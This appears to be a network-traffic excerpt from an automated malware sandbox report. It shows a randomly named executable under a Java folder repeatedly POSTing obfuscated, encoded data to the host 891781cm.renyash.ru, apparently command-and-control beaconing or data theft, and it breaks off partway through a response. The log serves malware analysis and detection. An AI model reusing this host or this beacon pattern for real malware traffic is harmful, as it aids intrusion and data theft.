                                                                                                                  CF-RAY: 8fb30d88dcc84394-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4148&min_rtt=1752&rtt_var=5449&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=69779&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  107 | 192.168.2.4 | 50054 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:27.910217047 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:28.260385990 CET | 1072 | OUT | Data Raw: 55 54 5d 53 5f 59 54 5f 55 5a 54 59 51 53 55 53 58 5e 5c 5b 59 5d 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UT]S_YT_UZTYQSUSX^\[Y]RX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?=X +-_2>=>,$-9$%?0< /;?>3*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:28.375190973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:28.635744095 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEW2z6J3%2BfVNSk5kTUiH3dZ%2By7ZMj3GvQDMR%2F9OUZ28TFBqpI3vOYuqx8doUI6WcRzug6LWfXi4yMsEeggWzso5AYkWkM5ddlscXnNgfx61i1inAN0hb6tVOWNGcIw36YyUx%2Fms0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d8e0bf48ca1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4784&min_rtt=2027&rtt_var=6275&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60616&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:28.726680040 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  108 | 192.168.2.4 | 50061 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:28.855739117 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:29.212543011 CET | 1072 | OUT | Data Raw: 50 52 5d 50 5f 5d 51 5a 55 5a 54 59 51 5c 55 50 58 5a 5c 58 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]P_]QZUZTYQ\UPXZ\XYPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(?=X %%=%(.Z0:?')$8/(;>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:29.324117899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:29.610662937 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUUDtdNb8HfizYPRcINalUvP2%2F0jSe%2BceqjoqcaIrmXr6ctNdaA4AhMa8wXrqhDmMoPhhN3A%2FEJa0%2BW1EY79yjNu6FM7gRiqHT7%2FZpsvdV%2BljiyPv7pAvSrLcTw2voer6S%2BLOy98"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d93fa2d32fc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4966&min_rtt=1942&rtt_var=6776&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=55861&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  109 | 192.168.2.4 | 50067 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:29.732331991 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:30.087661028 CET | 1072 | OUT | Data Raw: 50 56 58 51 5a 5a 54 5d 55 5a 54 59 51 58 55 57 58 5e 5c 5f 59 55 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXQZZT]UZTYQXUWX^\_YURY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(,=X#(>%>=\>,$B%-]$V$<;8_<-()#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:30.176873922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:30.353044987 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af1Vi2mpJwlPuASsCICRW%2BRB1WGRo7GRZTDllWJPmWAYe3ocjlzVSqfU4TXmyn5js0V7%2FQQH9VZ1Oh2a5R9QLlsPNyhJHLLa5kYQAtxou94krFRe%2BtL2kGDE9UNwSfKlG5huWjYi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d995f4c5e5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=1776&rtt_var=1376&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=316085&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  110 | 192.168.2.4 | 50073 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:30.480498075 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:30.837583065 CET | 1072 | OUT | Data Raw: 50 52 5d 56 5a 5e 51 5e 55 5a 54 59 51 5e 55 51 58 5e 5c 59 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]VZ^Q^UZTYQ^UQX^\YYVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \?6 ;)Y%.9\==+$>P-B;'/5$/ 8.?=<U(,#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:30.926383018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:31.097976923 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLqBsiERcGXwW%2FWr1VevF52u8pMNc2T%2FBUrl9c%2FGSPJQnEpI3AS2N8PKckbPRNcDcP7eTh%2BP4c%2FhWY4GcQgHMIjVTJUxvm7tZTqSv%2BTjLiSLq%2FyJxxRRZqhHk5h57vujzTgk2ikO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d9df8a88c8d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2015&rtt_var=1785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=238056&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  111 | 192.168.2.4 | 50079 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:31.234165907 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:31.587537050 CET | 1072 | OUT | Data Raw: 55 57 5d 57 5a 5d 51 5f 55 5a 54 59 51 59 55 52 58 5c 5c 59 59 5d 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]WZ]Q_UZTYQYURX\\YY]RZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?57;"%-5Z(-+$P,$<X3Y1'#/=?+W*<#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:31.688674927 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  112 | 192.168.2.4 | 50084 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:31.875824928 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:32.228365898 CET | 1796 | OUT | Data Raw: 50 55 58 56 5a 58 51 5b 55 5a 54 59 51 53 55 50 58 58 5c 54 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXVZXQ[UZTYQSUPXX\TYRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+4+>$.%).<'$=9+$?Q$?3Z,7(=8>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:32.386106014 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:32.551707983 CET | 964 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIFXqvd6BKmcgNIlmRgCZF27%2BO%2FMHzX%2BFhTEQjJzONG%2BIWxjWVGlqhHdaK5RnvRssVQHKV%2B5hvEEmDNy7E0aXOAj%2FQeGTlkadeRuEXFDmnpT3gzV2iqSr5dU2hmMS8Fx9stMLnER"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30da71a56de98-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=32636&min_rtt=28677&rtt_var=18672&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=24192&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 50 33 38 2f 59 3f 58 2e 5a 38 06 3f 54 26 06 3a 1a 24 20 34 58 32 3d 25 59 3a 2b 2c 13 28 3b 0e 07 25 5c 36 07 37 31 3e 5c 24 26 2e 5d 04 1d 25 5c 3e 3a 36 1b 2b 11 31 1d 2a 1c 3f 00 33 09 3b 5c 24 34 30 59 24 03 29 00 20 31 2c 0e 25 23 38 53 2a 39 02 02 33 2e 3e 57 20 3a 2e 57 0d 12 22 51 31 00 3e 0f 28 31 28 10 22 02 20 0e 33 01 20 09 27 3f 33 09 37 06 29 0e 3d 11 24 58 22 19 3d 1d 30 29 23 58 21 17 0c 00 22 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"P38/Y?X.Z8?T&:$ 4X2=%Y:+,(;%\671>\$&.]%\>:6+1*?3;\$40Y$) 1,%#8S*93.>W :.W"Q1>(1(" 3 '?37)=$X"=0)#X!""T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  113 | 192.168.2.4 | 50086 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:31.996481895 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:32.353317022 CET | 1072 | OUT | Data Raw: 50 53 58 55 5f 5c 54 5f 55 5a 54 59 51 58 55 53 58 5a 5c 54 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXU_\T_UZTYQXUSXZ\TYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ),"4%X25X)-+02Q:$#0/"$<;=7?.#*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:32.490699053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:32.671252012 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppopy6iR6lSqB8KCcVix74aDQbvRVJJTG9yIJun0PZejugwRwrNa9OcXmhT%2FNSYOEulJYFuiCfACqUdbK7JeFtfDacAJVXF95qz0ohVLpW%2FvFiCUoPR%2B2lT8XyZoAEDntjZ4juKk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30da7cba47289-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5749&min_rtt=4627&rtt_var=3979&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=107321&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  114 | 192.168.2.4 | 50092 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:32.794709921 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:33.150691032 CET | 1072 | OUT | Data Raw: 55 5e 5d 53 5f 5b 51 5e 55 5a 54 59 51 53 55 51 58 5a 5c 59 59 52 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]S_[Q^UZTYQSUQXZ\YYRR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (=Y#+-X2*(.$%-+$<"P3/<;=8($R(,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:33.261324883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:33.431134939 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0RUNffyr0VvRBVmtd63DKW4Xo6bg8NL2IQAk6h%2BzoDMI%2BnLIMtY1XiZyMETPfvbOgr2HNHwranBDPK2fur0FQxxaocrh0chWhjJNk7l75SGw%2BJyzHcpZdeoYvegyHBXo0OKKQzq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dac999e727d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3307&min_rtt=1974&rtt_var=3407&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=115497&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  115 | 192.168.2.4 | 50098 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:33.558489084 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:33.915911913 CET | 1072 | OUT | Data Raw: 50 51 5d 56 5f 5a 54 59 55 5a 54 59 51 5a 55 53 58 53 5c 54 59 51 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQ]V_ZTYUZTYQZUSXS\TYQR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+Y7]:1*=3X0".$/0&Q$,-?+<T(<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:34.030992031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:34.297204018 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
